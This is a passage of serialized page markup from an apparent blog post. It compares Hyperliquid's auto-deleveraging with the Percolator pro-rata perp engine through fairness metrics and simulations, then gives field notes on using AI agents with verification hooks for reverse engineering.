",{"type":25,"tag":82,"props":5408,"children":5410},{"className":5409},[212,4702],[5411],{"type":25,"tag":216,"props":5412,"children":5414},{"className":5413},[224],[5415],{"type":25,"tag":216,"props":5416,"children":5418},{"className":5417,"ariaHidden":230},[229],[5419,5445],{"type":25,"tag":216,"props":5420,"children":5422},{"className":5421},[235],[5423,5427,5432,5436,5441],{"type":25,"tag":216,"props":5424,"children":5426},{"className":5425,"style":4799},[240],[],{"type":25,"tag":216,"props":5428,"children":5430},{"className":5429,"style":5269},[246,2151],[5431],{"type":31,"value":5272},{"type":25,"tag":216,"props":5433,"children":5435},{"className":5434,"style":258},[257],[],{"type":25,"tag":216,"props":5437,"children":5439},{"className":5438},[263],[5440],{"type":31,"value":266},{"type":25,"tag":216,"props":5442,"children":5444},{"className":5443,"style":258},[257],[],{"type":25,"tag":216,"props":5446,"children":5448},{"className":5447},[235],[5449,5453],{"type":25,"tag":216,"props":5450,"children":5452},{"className":5451,"style":5293},[240],[],{"type":25,"tag":216,"props":5454,"children":5456},{"className":5455},[246],[5457],{"type":31,"value":1882},{"type":31,"value":5459}," means nothing was recovered.",{"type":25,"tag":2043,"props":5461,"children":5462},{},[5463,5467,5468,5592,5594,5813,5815,5920,5922,5974,5976,6028],{"type":25,"tag":64,"props":5464,"children":5465},{},[5466],{"type":31,"value":2060},{"type":31,"value":4983},{"type":25,"tag":82,"props":5469,"children":5471},{"className":5470},[212,4702],[5472],{"type":25,"tag":216,"props":5473,"children":5475},{"className":5474},[224],[5476],{"type":25,"tag":216,"props":5477,"children":5479},{"className":5478,"ariaHidden":230},[229],[5480,5506],{"type":25,"tag":216,"props":5481,"children":5483},{"className":5482},[235],[5484,5488,5493,5497,5502],{"type":25,"tag":216,"props":5485,"children":5487},{"className":5486,"style":5003},[240],[],{"type":25,"tag":216,"props":5489,"children":5491},{"className":5490},[246],[5492],{"type":31,"value":184},{"type":25,"tag":216,"props":5494,"children":5496},{"className":5495,"style":335},[257],[],{"type":25,"tag":216,"props":5498,"children":5500},{"className":5499},[340],[5501],{"type":31,"value":3378},{"type":25,"tag":216,"props":5503,"children":5505},{"className":5504,"style":335},[257],[],{"type":25,"tag":216,"props":5507,"children":5509},{"className":5508},[235],[5510,5515,5525,5530,5587],{"type":25,"tag":216,"props":5511,"children":5514},{"className":5512,"style":5513},[240],"height:1em;vertical-align:-0.25em;",[],{"type":25,"tag":216,"props":5516,"children":5518},{"className":5517},[246,31],[5519],{"type":25,"tag":216,"props":5520,"children":5522},{"className":5521},[246],[5523],{"type":31,"value":5524},"Gini",{"type":25,"tag":216,"props":5526,"children":5528},{"className":5527},[287],[5529],{"type":31,"value":1850},{"type":25,"tag":216,"props":5531,"children":5533},{"className":5532},[246],[5534,5539],{"type":25,"tag":216,"props":5535,"children":5537},{"className":5536},[246,2151],[5538],{"type":31,"value":2611},{"type":25,"tag":216,"props":5540,"children":5542},{"className":5541},[2159],[5543],{"type":25,"tag":216,"props":5544,"children":5546},{"className":5545},[298,299],[5547,5576],{"type":25,"tag":216,"props":5548,"children":5550},{"className":5549},[304],[5551,5571],{"type":25,"tag":216,"props":5552,"children":5554},{"className":5553,"style":2270},[309],[5555],{"type":25,"tag":216,"props":5556,"children":5557},{"style":2274},[5558,5562],{"type":25,"tag":216,"props":5559,"children":5561},{"className":5560,"style":2181},[319],[],{"type":25,"tag":216,"props":5563,"children":5565},{"className":5564},[2186,2187,2188,2189],[5566],{"type":25,"tag":216,"props":5567,"children":5569},{"className":5568},[246,2151,2189],[5570],{"type":31,"value":2289},{"type":25,"tag":216,"props":5572,"children":5574},{"className":5573},[408],[5575],{"type":31,"value":411},{"type":25,"tag":216,"props":5577,"children":5579},{"className":5578},[304],[5580],{"type":25,"tag":216,"props":5581,"children":5583},{"className":5582,"style":2209},[309],[5584],{"type":25,"tag":216,"props":5585,"children":5586},{},[],{"type":25,"tag":216,"props":5588,"children":5590},{"className":5589},[427],[5591],{"type":31,"value":1888},{"type":31,"value":5593}," where ",{"type":25,"tag":82,"props":5595,"children":5597},{"className":5596},[212,4702],[5598],{"type":25,"tag":216,"props":5599,"children":5601},{"className":5600},[224],[5602],{"type":25,"tag":216,"props":5603,"children":5605},{"className":5604,"ariaHidden":230},[229],[5606,5685],{"type":25,"tag":216,"props":5607,"children":5609},{"className":5608},[235],[5610,5615,5672,5676,5681],{"type":25,"tag":216,"props":5611,"children":5614},{"className":5612,"style":5613},[240],"height:0.8444em;vertical-align:-0.15em;",[],{"type":25,"tag":216,"props":5616,"children":5618},{"className":5617},[246],[5619,5624],{"type":25,"tag":216,"props":5620,"children":5622},{"className":5621},[246,2151],[5623],{"type":31,"value":2611},{"type":25,"tag":216,"props":5625,"children":5627},{"className":5626},[2159],[5628],{"type":25,"tag":216,"props":5629,"children":5631},{"className":5630},[298,299],[5632,5661],{"type":25,"tag":216,"props":5633,"children":5635},{"className":5634},[304],[5636,5656],{"type":25,"tag":216,"props":5637,"children":5639},{"className":5638,"style":2270},[309],[5640],{"type":25,"tag":216,"props":5641,"children":5642},{"style":2274},[5643,5647],{"type":25,"tag":216,"props":5644,"children":5646},{"className":5645,"style":2181},[319],[],{"type":25,"tag":216,"props":5648,"children":5650},{"className":5649},[2186,2187,2188,2189],[5651],{"type":25,"tag":216,"props":5652,"children":5654},{"className":5653},[246,2151,2189],[5655],{"type":31,"value":2289},{"type":25,"tag":216,"props":5657,"children":5659},{"className":5658},[408],[5660],{"type":31,"value":411},{"type":25,"tag":216,"props":5662,"children":5664},{"className":5663},[304],[5665],{"type":25,"tag":216,"props":5666,"children":5668},{"className":5667,"style":2209},[309],[5669],{"type":25,"tag":216,"props":5670,"children":5671},{},[],{"type":25,"tag":216,"props":5673,"children":5675},{"className":5674,"style":258},[257],[],{"type":25,"tag":216,"props":5677,"children":5679},{"className":5678},[263],[5680],{"type":31,"value":266},{"type":25,"tag":216,"props":5682,"children":5684},{"className":5683,"style":258},[257],[],{"type":25,"tag":216,"props":5686,"children":5688},{"className":5687},[235],[5689,5693,5750,5756],{"type":25,"tag":216,"props":5690,"children":5692},{"className":5691,"style":5513},[240],[],{"type":25,"tag":216,"props":5694,"children":5696},{"className":5695},[246],[5697,5702],{"type":25,"tag":216,"props":5698,"children":5700},{"className":5699},[246,2151],[5701],{"type":31,"value":2541},{"type":25,"tag":216,"props":5703,"children":5705},{"className":5704},[2159],[5706],{"type":25,"tag":216,"props":5707,"children":5709},{"className":5708},[298,299],[5710,5739],{"type":25,"tag":216,"props":5711,"children":5713},{"className":5712},[304],[5714,5734],{"type":25,"tag":216,"props":5715,"children":5717},{"className":5716,"style":2270},[309],[5718],{"type":25,"tag":216,"props":5719,"children":5720},{"style":2274},[5721,5725],{"type":25,"tag":216,"props":5722,"children":5724},{"className":5723,"style":2181},[319],[],{"type":25,"tag":216,"props":5726,"children":5728},{"className":5727},[2186,2187,2188,2189],[5729],{"type":25,"tag":216,"props":5730,"children":5732},{"className":5731},[246,2151,2189],[5733],{"type":31,"value":2289},{"type":25,"tag":216,"props":5735,"children":5737},{"className":5736},[408],[5738],{"type":31,"value":411},{"type":25,"tag":216,"props":5740,"children":5742},{"className":5741},[304],[5743],{"type":25,"tag":216,"props":5744,"children":5746},{"className":5745,"style":2209},[309],[5747],{"type":25,"tag":216,"props":5748,"children":5749},{},[],{"type":25,"tag":216,"props":5751,"children":5753},{"className":5752},[246],[5754],{"type":31,"value":5755},"/",{"type":25,"tag":216,"props":5757,"children":5759},{"className":5758},[246],[5760,5765],{"type":25,"tag":216,"props":5761,"children":5763},{"className":5762,"style":2467},[246,2151],[5764],{"type":31,"value":2470},{"type":25,"tag":216,"props":5766,"children":5768},{"className":5767},[2159],[5769],{"type":25,"tag":216,"props":5770,"children":5772},{"className":5771},[298,299],[5773,5802],{"type":25,"tag":216,"props":5774,"children":5776},{"className":5775},[304],[5777,5797],{"type":25,"tag":216,"props":5778,"children":5780},{"className":5779,"style":2270},[309],[5781],{"type":25,"tag":216,"props":5782,"children":5783},{"style":2489},[5784,5788],{"type":25,"tag":216,"props":5785,"children":5787},{"className":5786,"style":2181},[319],[],{"type":25,"tag":216,"props":5789,"children":5791},{"className":5790},[2186,2187,2188,2189],[5792],{"type":25,"tag":216,"props":5793,"children":5795},{"className":5794},[246,2151,2189],[5796],{"type":31,"value":2289},{"type":25,"tag":216,"props":5798,"children":5800},{"className":5799},[408],[5801],{"type":31,"value":411},{"type":25,"tag":216,"props":5803,"children":5805},{"className":5804},[304],[5806],{"type":25,"tag":216,"props":5807,"children":5809},{"className":5808,"style":2209},[309],[5810],{"type":25,"tag":216,"props":5811,"children":5812},{},[],{"type":31,"value":5814}," for each winner with ",{"type":25,"tag":82,"props":5816,"children":5818},{"className":5817},[212,4702],[5819],{"type":25,"tag":216,"props":5820,"children":5822},{"className":5821},[224],[5823],{"type":25,"tag":216,"props":5824,"children":5826},{"className":5825,"ariaHidden":230},[229],[5827,5907],{"type":25,"tag":216,"props":5828,"children":5830},{"className":5829},[235],[5831,5836,5893,5897,5903],{"type":25,"tag":216,"props":5832,"children":5835},{"className":5833,"style":5834},[240],"height:0.6891em;vertical-align:-0.15em;",[],{"type":25,"tag":216,"props":5837,"children":5839},{"className":5838},[246],[5840,5845],{"type":25,"tag":216,"props":5841,"children":5843},{"className":5842,"style":2467},[246,2151],[5844],{"type":31,"value":2470},{"type":25,"tag":216,"props":5846,"children":5848},{"className":5847},[2159],[5849],{"type":25,"tag":216,"props":5850,"children":5852},{"className":5851},[298,299],[5853,5882],{"type":25,"tag":216,"props":5854,"children":5856},{"className":5855},[304],[5857,5877],{"type":25,"tag":216,"props":5858,"children":5860},{"className":5859,"style":2270},[309],[5861],{"type":25,"tag":216,"props":5862,"children":5863},{"style":2489},[5864,5868],{"type":25,"tag":216,"props":5865,"children":5867},{"className":5866,"style":2181},[319],[],{"type":25,"tag":216,"props":5869,"children":5871},{"className":5870},[2186,2187,2188,2189],[5872],{"type":25,"tag":216,"props":5873,"children":5875},{"className":5874},[246,2151,2189],[5876],{"type":31,"value":2289},{"type":25,"tag":216,"props":5878,"children":5880},{"className":5879},[408],[5881],{"type":31,"value":411},{"type":25,"tag":216,"props":5883,"children":5885},{"className":5884},[304],[5886],{"type":25,"tag":216,"props":5887,"children":5889},{"className":5888,"style":2209},[309],[5890],{"type":25,"tag":216,"props":5891,"children":5892},{},[],{"type":25,"tag":216,"props":5894,"children":5896},{"className":5895,"style":258},[257],[],{"type":25,"tag":216,"props":5898,"children":5900},{"className":5899},[263],[5901],{"type":31,"value":5902},">",{"type":25,"tag":216,"props":5904,"children":5906},{"className":5905,"style":258},[257],[],{"type":25,"tag":216,"props":5908,"children":5910},{"className":5909},[235],[5911,5915],{"type":25,"tag":216,"props":5912,"children":5914},{"className":5913,"style":5293},[240],[],{"type":25,"tag":216,"props":5916,"children":5918},{"className":5917},[246],[5919],{"type":31,"value":1882},{"type":31,"value":5921}," — how uniformly the haircut burden is distributed across profitable traders. ",{"type":25,"tag":82,"props":5923,"children":5925},{"className":5924},[212,4702],[5926],{"type":25,"tag":216,"props":5927,"children":5929},{"className":5928},[224],[5930],{"type":25,"tag":216,"props":5931,"children":5933},{"className":5932,"ariaHidden":230},[229],[5934,5961],{"type":25,"tag":216,"props":5935,"children":5937},{"className":5936},[235],[5938,5942,5948,5952,5957],{"type":25,"tag":216,"props":5939,"children":5941},{"className":5940,"style":4799},[240],[],{"type":25,"tag":216,"props":5943,"children":5945},{"className":5944,"style":2152},[246,2151],[5946],{"type":31,"value":5947},"F",{"type":25,"tag":216,"props":5949,"children":5951},{"className":5950,"style":258},[257],[],{"type":25,"tag":216,"props":5953,"children":5955},{"className":5954},[263],[5956],{"type":31,"value":266},{"type":25,"tag":216,"props":5958,"children":5960},{"className":5959,"style":258},[257],[],{"type":25,"tag":216,"props":5962,"children":5964},{"className":5963},[235],[5965,5969],{"type":25,"tag":216,"props":5966,"children":5968},{"className":5967,"style":5293},[240],[],{"type":25,"tag":216,"props":5970,"children":5972},{"className":5971},[246],[5973],{"type":31,"value":184},{"type":31,"value":5975}," means everyone loses the same fraction of their PNL. ",{"type":25,"tag":82,"props":5977,"children":5979},{"className":5978},[212,4702],[5980],{"type":25,"tag":216,"props":5981,"children":5983},{"className":5982},[224],[5984],{"type":25,"tag":216,"props":5985,"children":5987},{"className":5986,"ariaHidden":230},[229],[5988,6015],{"type":25,"tag":216,"props":5989,"children":5991},{"className":5990},[235],[5992,5996,6001,6005,6011],{"type":25,"tag":216,"props":5993,"children":5995},{"className":5994,"style":4799},[240],[],{"type":25,"tag":216,"props":5997,"children":5999},{"className":5998,"style":2152},[246,2151],[6000],{"type":31,"value":5947},{"type":25,"tag":216,"props":6002,"children":6004},{"className":6003,"style":258},[257],[],{"type":25,"tag":216,"props":6006,"children":6008},{"className":6007},[263],[6009],{"type":31,"value":6010},"≈",{"type":25,"tag":216,"props":6012,"children":6014},{"className":6013,"style":258},[257],[],{"type":25,"tag":216,"props":6016,"children":6018},{"className":6017},[235],[6019,6023],{"type":25,"tag":216,"props":6020,"children":6022},{"className":6021,"style":5293},[240],[],{"type":25,"tag":216,"props":6024,"children":6026},{"className":6025},[246],[6027],{"type":31,"value":1882},{"type":31,"value":6029}," means a few get wiped while most are untouched.",{"type":25,"tag":2043,"props":6031,"children":6032},{},[6033,6037,6038,6198,6200,6294,6296],{"type":25,"tag":64,"props":6034,"children":6035},{},[6036],{"type":31,"value":2070},{"type":31,"value":4983},{"type":25,"tag":82,"props":6039,"children":6041},{"className":6040},[212,4702],[6042],{"type":25,"tag":216,"props":6043,"children":6045},{"className":6044},[224],[6046],{"type":25,"tag":216,"props":6047,"children":6049},{"className":6048,"ariaHidden":230},[229],[6050],{"type":25,"tag":216,"props":6051,"children":6053},{"className":6052},[235],[6054,6059,6136,6141],{"type":25,"tag":216,"props":6055,"children":6058},{"className":6056,"style":6057},[240],"height:1.0253em;vertical-align:-0.2753em;",[],{"type":25,"tag":216,"props":6060,"children":6062},{"className":6061},[246],[6063,6068],{"type":25,"tag":216,"props":6064,"children":6066},{"className":6065,"style":2824},[246,2151],[6067],{"type":31,"value":2827},{"type":25,"tag":216,"props":6069,"children":6071},{"className":6070},[2159],[6072],{"type":25,"tag":216,"props":6073,"children":6075},{"className":6074},[298,299],[6076,6124],{"type":25,"tag":216,"props":6077,"children":6079},{"className":6078},[304],[6080,6119],{"type":25,"tag":216,"props":6081,"children":6084},{"className":6082,"style":6083},[309],"height:0.6644em;",[6085,6102],{"type":25,"tag":216,"props":6086,"children":6088},{"style":6087},"top:-2.4247em;margin-left:-0.109em;margin-right:0.05em;",[6089,6093],{"type":25,"tag":216,"props":6090,"children":6092},{"className":6091,"style":2181},[319],[],{"type":25,"tag":216,"props":6094,"children":6096},{"className":6095},[2186,2187,2188,2189],[6097],{"type":25,"tag":216,"props":6098,"children":6100},{"className":6099,"style":2152},[246,2151,2189],[6101],{"type":31,"value":177},{"type":25,"tag":216,"props":6103,"children":6105},{"style":6104},"top:-3.063em;margin-right:0.05em;",[6106,6110],{"type":25,"tag":216,"props":6107,"children":6109},{"className":6108,"style":2181},[319],[],{"type":25,"tag":216,"props":6111,"children":6113},{"className":6112},[2186,2187,2188,2189],[6114],{"type":25,"tag":216,"props":6115,"children":6117},{"className":6116,"style":2325},[246,2151,2189],[6118],{"type":31,"value":2328},{"type":25,"tag":216,"props":6120,"children":6122},{"className":6121},[408],[6123],{"type":31,"value":411},{"type":25,"tag":216,"props":6125,"children":6127},{"className":6126},[304],[6128],{"type":25,"tag":216,"props":6129,"children":6132},{"className":6130,"style":6131},[309],"height:0.2753em;",[6133],{"type":25,"tag":216,"props":6134,"children":6135},{},[],{"type":25,"tag":216,"props":6137,"children":6139},{"className":6138},[246],[6140],{"type":31,"value":5755},{"type":25,"tag":216,"props":6142,"children":6144},{"className":6143},[246],[6145,6150],{"type":25,"tag":216,"props":6146,"children":6148},{"className":6147,"style":2824},[246,2151],[6149],{"type":31,"value":2827},{"type":25,"tag":216,"props":6151,"children":6153},{"className":6152},[2159],[6154],{"type":25,"tag":216,"props":6155,"children":6157},{"className":6156},[298,299],[6158,6187],{"type":25,"tag":216,"props":6159,"children":6161},{"className":6160},[304],[6162,6182],{"type":25,"tag":216,"props":6163,"children":6165},{"className":6164,"style":2698},[309],[6166],{"type":25,"tag":216,"props":6167,"children":6168},{"style":2846},[6169,6173],{"type":25,"tag":216,"props":6170,"children":6172},{"className":6171,"style":2181},[319],[],{"type":25,"tag":216,"props":6174,"children":6176},{"className":6175},[2186,2187,2188,2189],[6177],{"type":25,"tag":216,"props":6178,"children":6180},{"className":6179,"style":2152},[246,2151,2189],[6181],{"type":31,"value":177},{"type":25,"tag":216,"props":6183,"children":6185},{"className":6184},[408],[6186],{"type":31,"value":411},{"type":25,"tag":216,"props":6188,"children":6190},{"className":6189},[304],[6191],{"type":25,"tag":216,"props":6192,"children":6194},{"className":6193,"style":2209},[309],[6195],{"type":25,"tag":216,"props":6196,"children":6197},{},[],{"type":31,"value":6199}," — ",{"type":25,"tag":82,"props":6201,"children":6203},{"className":6202},[212,4702],[6204],{"type":25,"tag":216,"props":6205,"children":6207},{"className":6206},[224],[6208],{"type":25,"tag":216,"props":6209,"children":6211},{"className":6210,"ariaHidden":230},[229],[6212],{"type":25,"tag":216,"props":6213,"children":6215},{"className":6214},[235],[6216,6221],{"type":25,"tag":216,"props":6217,"children":6220},{"className":6218,"style":6219},[240],"height:0.9587em;vertical-align:-0.2753em;",[],{"type":25,"tag":216,"props":6222,"children":6224},{"className":6223},[246],[6225,6230],{"type":25,"tag":216,"props":6226,"children":6228},{"className":6227,"style":2824},[246,2151],[6229],{"type":31,"value":2827},{"type":25,"tag":216,"props":6231,"children":6233},{"className":6232},[2159],[6234],{"type":25,"tag":216,"props":6235,"children":6237},{"className":6236},[298,299],[6238,6283],{"type":25,"tag":216,"props":6239,"children":6241},{"className":6240},[304],[6242,6278],{"type":25,"tag":216,"props":6243,"children":6245},{"className":6244,"style":6083},[309],[6246,6262],{"type":25,"tag":216,"props":6247,"children":6248},{"style":6087},[6249,6253],{"type":25,"tag":216,"props":6250,"children":6252},{"className":6251,"style":2181},[319],[],{"type":25,"tag":216,"props":6254,"children":6256},{"className":6255},[2186,2187,2188,2189],[6257],{"type":25,"tag":216,"props":6258,"children":6260},{"className":6259,"style":2152},[246,2151,2189],[6261],{"type":31,"value":177},{"type":25,"tag":216,"props":6263,"children":6264},{"style":6104},[6265,6269],{"type":25,"tag":216,"props":6266,"children":6268},{"className":6267,"style":2181},[319],[],{"type":25,"tag":216,"props":6270,"children":6272},{"className":6271},[2186,2187,2188,2189],[6273],{"type":25,"tag":216,"props":6274,"children":6276},{"className":6275,"style":2325},[246,2151,2189],[6277],{"type":31,"value":2328},{"type":25,"tag":216,"props":6279,"children":6281},{"className":6280},[408],[6282],{"type":31,"value":411},{"type":25,"tag":216,"props":6284,"children":6286},{"className":6285},[304],[6287],{"type":25,"tag":216,"props":6288,"children":6290},{"className":6289,"style":6131},[309],[6291],{"type":25,"tag":216,"props":6292,"children":6293},{},[],{"type":31,"value":6295}," is the haircut capacity (total positive PNL) after going through a policy ",{"type":25,"tag":82,"props":6297,"children":6299},{"className":6298},[212,4702],[6300],{"type":25,"tag":216,"props":6301,"children":6303},{"className":6302},[224],[6304],{"type":25,"tag":216,"props":6305,"children":6307},{"className":6306,"ariaHidden":230},[229],[6308],{"type":25,"tag":216,"props":6309,"children":6311},{"className":6310},[235],[6312,6317],{"type":25,"tag":216,"props":6313,"children":6316},{"className":6314,"style":6315},[240],"height:0.4306em;",[],{"type":25,"tag":216,"props":6318,"children":6320},{"className":6319,"style":2325},[246,2151],[6321],{"type":31,"value":2328},{"type":25,"tag":38,"props":6323,"children":6324},{},[6325],{"type":31,"value":6326},"We can now simulate these values for both Hyperliquid and Percolator, a new pro-rata based perp engine developed by Anatoly Yakovenko.",{"type":25,"tag":6328,"props":6329,"children":6331},"git-hub-repo-link",{"url":6330},"https://github.com/aeyakovenko/percolator",[],{"type":25,"tag":38,"props":6333,"children":6334},{},[6335,6337,6342],{"type":31,"value":6336},"Given a fixed ",{"type":25,"tag":64,"props":6338,"children":6339},{},[6340],{"type":31,"value":6341},"a priori",{"type":31,"value":6343}," price, which will simulate both a crash followed by a recovery, and a crash with an equal crash after (this is the most common reason for deleveraging, but the opposite could also happen).",{"type":25,"tag":38,"props":6345,"children":6346},{},[6347,6349,6354,6356,6433],{"type":31,"value":6348},"One prediction that we can make is that Percolator is ",{"type":25,"tag":64,"props":6350,"children":6351},{},[6352],{"type":31,"value":6353},"perfectly fair",{"type":31,"value":6355}," according to this scoring: the ",{"type":25,"tag":82,"props":6357,"children":6359},{"className":6358},[212,4702],[6360],{"type":25,"tag":216,"props":6361,"children":6363},{"className":6362},[224],[6364],{"type":25,"tag":216,"props":6365,"children":6367},{"className":6366,"ariaHidden":230},[229],[6368],{"type":25,"tag":216,"props":6369,"children":6371},{"className":6370},[235],[6372,6376],{"type":25,"tag":216,"props":6373,"children":6375},{"className":6374,"style":5613},[240],[],{"type":25,"tag":216,"props":6377,"children":6379},{"className":6378},[246],[6380,6385],{"type":25,"tag":216,"props":6381,"children":6383},{"className":6382},[246,2151],[6384],{"type":31,"value":2611},{"type":25,"tag":216,"props":6386,"children":6388},{"className":6387},[2159],[6389],{"type":25,"tag":216,"props":6390,"children":6392},{"className":6391},[298,299],[6393,6422],{"type":25,"tag":216,"props":6394,"children":6396},{"className":6395},[304],[6397,6417],{"type":25,"tag":216,"props":6398,"children":6400},{"className":6399,"style":2270},[309],[6401],{"type":25,"tag":216,"props":6402,"children":6403},{"style":2274},[6404,6408],{"type":25,"tag":216,"props":6405,"children":6407},{"className":6406,"style":2181},[319],[],{"type":25,"tag":216,"props":6409,"children":6411},{"className":6410},[2186,2187,2188,2189],[6412],{"type":25,"tag":216,"props":6413,"children":6415},{"className":6414},[246,2151,2189],[6416],{"type":31,"value":2289},{"type":25,"tag":216,"props":6418,"children":6420},{"className":6419},[408],[6421],{"type":31,"value":411},{"type":25,"tag":216,"props":6423,"children":6425},{"className":6424},[304],[6426],{"type":25,"tag":216,"props":6427,"children":6429},{"className":6428,"style":2209},[309],[6430],{"type":25,"tag":216,"props":6431,"children":6432},{},[],{"type":31,"value":6434}," are the same for everyone, thus the Gini coefficient must be 0.",{"type":25,"tag":38,"props":6436,"children":6437},{},[6438,6440,6445],{"type":31,"value":6439},"We are ignoring the ",{"type":25,"tag":64,"props":6441,"children":6442},{},[6443],{"type":31,"value":6444},"a posteriori",{"type":31,"value":6446}," price impact that deleveraging causes (read about the Oct 10 crash analysis in that paper). Cross-margin leverage is also interesting because it introduces more correlation between cross-traded assets, while with Percolator we have one risk engine per asset (slab).",{"type":25,"tag":38,"props":6448,"children":6449},{},[6450],{"type":31,"value":6451},"Hyperliquid also has an interesting caveat we showed earlier, as it operates with a conditional insurance fund: we will simulate a single asset for now, but this influences the equation when we have multiple assets being traded in either isolated or cross-margin mode.",{"type":25,"tag":26,"props":6453,"children":6455},{"id":6454},"simulations",[6456],{"type":31,"value":6457},"Simulations",{"type":25,"tag":38,"props":6459,"children":6460},{},[6461],{"type":31,"value":6462},"Let's consider the following price scenarios, as we said:",{"type":25,"tag":38,"props":6464,"children":6465},{},[6466],{"type":25,"tag":6467,"props":6468,"children":6471},"img",{"alt":6469,"src":6470},"Price scenarios for the simulation","/posts/hyperliquid-risk-engine/price_scenarios.png",[],{"type":25,"tag":38,"props":6473,"children":6474},{},[6475],{"type":31,"value":6476},"Running this simulation of both systems with a Python reimplementation yields these results:",{"type":25,"tag":38,"props":6478,"children":6479},{},[6480],{"type":25,"tag":6467,"props":6481,"children":6484},{"alt":6482,"src":6483},"Trilemma radar comparing HL and Percolator","/posts/hyperliquid-risk-engine/trilemma_radar.png",[],{"type":25,"tag":606,"props":6486,"children":6488},{"id":6487},"percolator-is-more-optimistic",[6489],{"type":31,"value":6490},"Percolator Is More \"Optimistic\"",{"type":25,"tag":38,"props":6492,"children":6493},{},[6494,6496,6501,6503,6508,6510,6516,6518,6523],{"type":31,"value":6495},"The key difference is what happens to positions. ADL ",{"type":25,"tag":64,"props":6497,"children":6498},{},[6499],{"type":31,"value":6500},"permanently closes",{"type":31,"value":6502}," them: if the market keeps moving in your favor, tough luck, you're already out and have to re-enter at the new price. Percolator only reduces what you can ",{"type":25,"tag":64,"props":6504,"children":6505},{},[6506],{"type":31,"value":6507},"withdraw",{"type":31,"value":6509},", but the position stays open. If conditions improve, ",{"type":25,"tag":82,"props":6511,"children":6513},{"className":6512},[],[6514],{"type":31,"value":6515},"Residual",{"type":31,"value":6517}," goes up, ",{"type":25,"tag":82,"props":6519,"children":6521},{"className":6520},[],[6522],{"type":31,"value":2611},{"type":31,"value":6524}," climbs back toward 1, and you get your PNL back without doing anything.",{"type":25,"tag":38,"props":6526,"children":6527},{},[6528,6530,6535],{"type":31,"value":6529},"We can see this in a short squeeze scenario (60% short market, price +10%). HL's queue closes 8 of the 27 winning longs — those traders get zero if the rally continues. Under Percolator, all 27 keep their full positions (only the withdrawable profit is reduced by the uniform haircut) and all participate in the continued move. Note that HL's surviving positions are at full size, so they individually capture ",{"type":25,"tag":64,"props":6531,"children":6532},{},[6533],{"type":31,"value":6534},"more",{"type":31,"value":6536}," per position, though the tradeoff is that fewer traders get to participate.",{"type":25,"tag":38,"props":6538,"children":6539},{},[6540],{"type":25,"tag":6467,"props":6541,"children":6544},{"alt":6542,"src":6543},"Rebound opportunity under Percolator vs HL ADL","/posts/hyperliquid-risk-engine/rebound_opportunity.png",[],{"type":25,"tag":26,"props":6546,"children":6548},{"id":6547},"some-points-to-be-made",[6549],{"type":31,"value":6550},"Some Points to Be Made",{"type":25,"tag":606,"props":6552,"children":6554},{"id":6553},"percolator-is-indifferent-to-leverage",[6555],{"type":31,"value":6556},"Percolator Is Indifferent to Leverage",{"type":25,"tag":38,"props":6558,"children":6559},{},[6560],{"type":31,"value":6561},"We can prove that this is quite the opposite for Hyperliquid, as we've already traced the implementation of the ADL algorithm, which disproportionately targets high leverages.",{"type":25,"tag":38,"props":6563,"children":6564},{},[6565],{"type":25,"tag":6467,"props":6566,"children":6569},{"alt":6567,"src":6568},"Leverage indifference","/posts/hyperliquid-risk-engine/leverage_indifference.png",[],{"type":25,"tag":606,"props":6571,"children":6573},{"id":6572},"fairness",[6574],{"type":31,"value":2060},{"type":25,"tag":38,"props":6576,"children":6577},{},[6578],{"type":31,"value":6579},"A point made in the same paper is that Hyperliquid is \"antifair\": by this point we should have proven that in the implementation of the node itself, in the way positions to be closed are chosen (descend from the highest-scored one to lower; don't touch anything else).",{"type":25,"tag":38,"props":6581,"children":6582},{},[6583],{"type":25,"tag":6467,"props":6584,"children":6587},{"alt":6585,"src":6586},"Haircut distribution","/posts/hyperliquid-risk-engine/haircut_dist.png",[],{"type":25,"tag":38,"props":6589,"children":6590},{},[6591,6593,6598],{"type":31,"value":6592},"The paper already states in prop. 8.1 that queue-based algos (like HL) reach solvency faster. We can see that by looking at how ADL is triggered: in ",{"type":25,"tag":82,"props":6594,"children":6596},{"className":6595},[],[6597],{"type":31,"value":543},{"type":31,"value":6599}," we start by fully closing the worst position against the best-performing trader.",{"type":25,"tag":26,"props":6601,"children":6603},{"id":6602},"strengths-and-limitations-of-agents-for-reverse-engineering",[6604],{"type":31,"value":6605},"Strengths and Limitations of Agents for Reverse Engineering",{"type":25,"tag":38,"props":6607,"children":6608},{},[6609],{"type":31,"value":6610},"In general, the lion's share of the work is done by the underlying model, save for very straightforward tasks: attempts to overly aid the model in \"search problems\", meaning having it pick among a possible set of conclusions, usually lead to diminished performance.",{"type":25,"tag":606,"props":6612,"children":6614},{"id":6613},"hooks",[6615],{"type":31,"value":6616},"Hooks",{"type":25,"tag":38,"props":6618,"children":6619},{},[6620,6622,6626],{"type":31,"value":6621},"What tools are excellent at, on the other hand, is checking the agent's work via ",{"type":25,"tag":64,"props":6623,"children":6624},{},[6625],{"type":31,"value":6613},{"type":31,"value":6627},": the agent proposes a solution to a very guessy problem, for example type recovery, and we automatically use the compiler scaffolding to check whether the given type would have compatible offsets and nested pointers compared to what is really used at the assembly level. A similar but simpler reasoning was applied to data flow in the reconstructed Rust snippets.",{"type":25,"tag":38,"props":6629,"children":6630},{},[6631],{"type":31,"value":6632},"At the same time, there's a very thin line between getting a readable output with no validation, and getting something that's unreadable but technically \"passes\" according to the hook: in general, hooks trade time and readability for concrete properties to be sure of on the output of each stage, for example whether the Rust sample compiles and uses variables that are mappable 1:1 to the disassembly.",{"type":25,"tag":606,"props":6634,"children":6636},{"id":6635},"scale",[6637],{"type":31,"value":6638},"Scale",{"type":25,"tag":38,"props":6640,"children":6641},{},[6642],{"type":31,"value":6643},"The second lesson to be learned is that agents really shine at scale: newer models can hold more context than the best reverse engineers out there, so using them for bulk looped tasks (like renaming many functions) is optimal.",{"type":25,"tag":38,"props":6645,"children":6646},{},[6647],{"type":31,"value":6648},"That being said, agents are also far more overconfident than the best reverse engineers. In setups where the agent has tools that \"write\" to the decompiler view, wrong guesses compounded across recovery stages; tools prevented that by prompting agents that failed their scrutiny to give up and circle back to harder questions with more data, and could thus handle longer runs better.",{"type":25,"tag":606,"props":6650,"children":6652},{"id":6651},"whats-next",[6653],{"type":31,"value":6654},"What's next?",{"type":25,"tag":38,"props":6656,"children":6657},{},[6658],{"type":31,"value":6659},"This is by no means a strict scientific verdict, but rather some field notes. The public source code for the agents and their tools can be found over at this GitHub repo:",{"type":25,"tag":6328,"props":6661,"children":6662},{"url":164},[],{"type":25,"tag":38,"props":6664,"children":6665},{},[6666],{"type":31,"value":6667},"The analyzed binary can be found 